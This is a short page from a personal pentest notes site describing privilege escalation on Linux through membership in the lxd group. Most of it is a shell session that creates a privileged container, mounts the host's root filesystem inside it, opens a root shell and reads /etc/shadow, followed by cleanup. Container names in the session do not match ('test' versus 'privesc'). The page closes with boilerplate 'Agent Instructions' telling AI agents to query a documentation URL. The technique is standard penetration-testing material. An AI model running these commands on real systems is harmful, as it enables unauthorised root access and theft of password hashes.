# LXD group - N/A

## <mark style="color:red;">Privilege escalation</mark> using lxd group

```bash
test@server-01:~$ id
uid=1000(test) gid=1000(test) groups=1000(test),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),110(lxd)

# Init lxd to create "root device"
test@server-01:/dev/shm$ lxd init
Would you like to use LXD clustering? (yes/no) [default=no]: n
Do you want to configure a new storage pool? (yes/no) [default=yes]: y
Name of the new storage pool [default=default]: 
Name of the storage backend to use (zfs, ceph, btrfs, dir, lvm) [default=zfs]: 
Create a new ZFS pool? (yes/no) [default=yes]: 
Would you like to use an existing empty block device (e.g. a disk or partition)? (yes/no) [default=no]: 
Size in GB of the new loop device (1GB minimum) [default=19GB]: 1
Would you like to connect to a MAAS server? (yes/no) [default=no]: 
Would you like to create a new local network bridge? (yes/no) [default=yes]: no
Would you like to configure LXD to use an existing bridge or host interface? (yes/no) [default=no]: 
Would you like the LXD server to be available over the network? (yes/no) [default=no]: 
Would you like stale cached images to be updated automatically? (yes/no) [default=yes]: no
Would you like a YAML "lxd init" preseed to be printed? (yes/no) [default=no]: 

# Create image
test@server-01:/dev/shm$ lxc init ubuntu:16.04 test -c security.privileged=true
Creating test
test@server-01:/dev/shm$ lxc image list
+-------+--------------+--------+---------------------------------------------+--------------+-----------+----------+------------------------------+
| ALIAS | FINGERPRINT  | PUBLIC |                 DESCRIPTION                 | ARCHITECTURE |   TYPE    |   SIZE   |         UPLOAD DATE          |
+-------+--------------+--------+---------------------------------------------+--------------+-----------+----------+------------------------------+
|       | 712a58368655 | no     | ubuntu 16.04 LTS amd64 (release) (20211001) | x86_64       | CONTAINER | 171.55MB | Apr 28, 2022 at 7:19am (UTC) |
+-------+--------------+--------+---------------------------------------------+--------------+-----------+----------+------------------------------+

# Mount system root (/) to container
test@server-01:/dev/shm$ lxc config device add privesc whatever disk source=/ path=/mnt/root recursive=true
Device whatever added to privesc

# Start container and reap the rewards
test@server-01:/dev/shm$ lxc start privesc
test@server-01:/dev/shm$ lxc exec privesc bash
root@privesc:~# cd /mnt/root/
root@test:/mnt/root# cat etc/shadow
root:*:18913:0:99999:7:::

# Clean up
test@server-01:/dev/shm$ lxc stop privesc --force
test@server-01:/dev/shm$ lxc delete privesc
test@server-01:/dev/shm$ lxc image delete 712a58368655
```


---

# Agent Instructions: Querying This Documentation

If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter:

```
GET https://0xpthree.gitbook.io/notes/exploits-pocs/lxd-group-n-a.md?ask=<question>
```

The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.